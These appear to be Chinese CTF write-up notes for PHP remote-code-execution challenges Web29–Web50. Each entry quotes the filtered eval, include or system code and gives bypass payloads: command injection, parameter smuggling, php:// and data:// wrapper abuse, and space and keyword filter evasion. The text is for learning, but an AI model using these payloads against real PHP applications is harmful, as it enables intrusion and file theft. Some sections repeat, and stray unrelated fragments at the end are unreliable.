Rce漏洞简介思维导图
Web29
代码审计:
if(!preg_match("/flag/i", $c)){
eval($c);
传参没有flag(大小写都没有出现)
Payload:
?c=system("ls");
?c=system("tac *lag.php");
Web30
代码审计:过滤了flag|system|php
if(!preg_match("/flag|system|php/i", $c)){
eval($c);
}
payload:
?c=echo shell_exec("tac f*");
Web31
代码审计:参数逃逸绕过空格
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
eval($c);
}
payload:
?c=eval($_GET["p"]);&p=system("tac flag.php");
Web32
过滤内容
if(!preg_match(“/flag|system|php|cat|sort|shell|.| |'|`|echo|;|(/i”, $c))
参数逃逸+为协议绕过+%0a绕过空格
?c=include%0a$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php
Base64解码
Web32
过滤内容
if(!preg_match(“/flag|system|php|cat|sort|shell|.| |'|`|echo|;|(/i”, $c))
参数逃逸+为协议绕过+%0a绕过空格
?c=include%0a$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php
Base64解码
Web32
过滤内容
if(!preg_match(“/flag|system|php|cat|sort|shell|.| |'|`|echo|;|(/i”, $c))
参数逃逸+为协议绕过+%0a绕过空格
payload
?c=include%0a$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php
Base64解码
Web33
过滤语句
if(!preg_match(“/flag|system|php|cat|sort|shell|.| |'|`|echo|;|(|”/i", $c))
参数逃逸+为协议绕过+%0a绕过空格
?c=include%0a$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php
Base64解码
Web34
过滤内容
if(!preg_match(“/flag|system|php|cat|sort|shell|.| |'|`|echo|;|(|”/i", $c))
参数逃逸+为协议绕过+%0a绕过空格
?c=include%0a$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php
Base64解码
Web35
过滤了多一个>
!preg_match(“/flag|system|php|cat|sort|shell|.| |'|`|echo|;|(|:|”|<|=/i", $c)){
过滤内容
if(!preg_match(“/flag|system|php|cat|sort|shell|.| |'|`|echo|;|(|”/i", $c))
参数逃逸+为协议绕过+%0a绕过空格
?c=include%0a$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php
Base64解码
Web36
过滤语句(多了对数字的过滤)
if(!preg_match(“/flag|system|php|cat|sort|shell|.| |'|`|echo|;|(|:|”|<|=|/|[0-9]/i", $c))
payload参数逃逸+为协议绕过+%0a绕过空格,get传参变为a
?c=include%0a$_GET[a]?>&a=php://filter/convert.base64-encode/resource=flag.php
Web37
if(!preg_match("/flag/i", $c)){
include($c);
echo $flag;
利用include函数,绕过flag,用data为协议(data://text/plain)
Payload:
?c=data://text/plain,<?php system('tac fl*.*');?>
Web38
if(!preg_match("/flag|php|file/i", $c)){
include($c);
echo $flag;
}
利用include函数,绕过flag,用data为协议(data://text/plain)
Payload:
?c=data://text/plain,<?php system('tac fl*.*');?>
Web39
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag/i", $c)){
include($c.".php");
}
利用include函数,绕过flag,用data为协议(data://text/plain)
Payload:
?c=data://text/plain,<?php system('tac fl*.*');?>
Web40
正则转换在线网站
RegexperRegular expression visualizer using railroad diagrams
https://regexper.com/
?c=print_r(get_defined_vars());可以输出所有的变量,如果此时通过post传递一个1=phpinfo();,那么打印的变量就会多一个
根据输出内容可以看到post传递的内容在数组的第二个中
通过next即可获取到数组中的第二个数组的指针。并打印出来。
然后利用array_pop()这个函数将数组中的值可以弹出
?c=eval(array_pop((next(get_defined_vars()))));
post中提交 1=system(‘tac flag.php’);
解释:通过post传递一个值,会存储在当前页面的变量中,get_defined_vars()获取当前页面所有变量,next取当前页面变量的第二个,也就是一个数组,array_pop是弹出数组的值,eval执行弹出的值。
Payload(无参rce):
?c=eval(pos(next(get_defined_vars())));
post data:
1=system("tac fla*");
Web41
Web42
system($c." >/dev/null 2>&1");
c参数变量拼接了>/dev/null 2>&1
或运算符绕过,%0a换行绕过
Payload
url + ?c=tac flag.php ||
url +?c=tac flag.php ; ls
url + ?c=tac flag.php%0a
Web43
if(!preg_match("/;|cat|flag/i", $c)){
system($c." >/dev/null 2>&1");
nl,tac绕过cat
c参数变量拼接了>/dev/null 2>&1
或运算符绕过,%0a换行绕过
Payload
url + ?c=tac flag.php ||
url +?c=tac flag.php ; ls
url + ?c=tac flag.php%0a
Web44
if(!preg_match("/;|cat|flag/i", $c)){
system($c." >/dev/null 2>&1");
Flag绕过方法拼接和*
nl,tac绕过cat
c参数变量拼接了>/dev/null 2>&1
或运算符绕过,%0a换行绕过
Payload
url + ?c=tac fl''ag.php||
url + ?c=tac fl*%0A
Web45
if(!preg_match("/\;|cat|flag| /i", $c)){
system($c." >/dev/null 2>&1");
过滤了空格
空格绕过
<、<>、%20(space)、%09(tab)、$IFS$9、${IFS}、$IFS、{cat,/etc/passwd}、%0a(回车)
Payload
url + ?c=tac%09fl''ag.php||
Web46
if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*/i", $c)){
system($c." >/dev/null 2>&1");
绕过空格
url + ?c=tac%09fl?g.php||
url + ?c=tac%09fl''ag.php||
Web47
if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`/i", $c)){
system($c." >/dev/null 2>&1");
绕过空格
url + ?c=tac%09fl?g.php||
url + ?c=tac%09fl''ag.php||
Web48
if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`/i", $c)){
system($c." >/dev/null 2>&1");
绕过空格
url + ?c=tac%09fl?g.php||
url + ?c=tac%09fl''ag.php||
Web49
if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%/i", $c)){
system($c." >/dev/null 2>&1");
绕过空格
url + ?c=tac%09fl?g.php||
url + ?c=tac%09fl''ag.php||
Web50
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%|\x09|\x26/i", $c)){
system($c." >/dev/null 2>&1");
}
}else{
highlight_file(__FILE__);
}
Payload:
url + ?c=tac<>fl''ag.php||
)
)
、readLine(),printf() 和format() ))
:智能建筑大数据管理平台(代码示例))
)
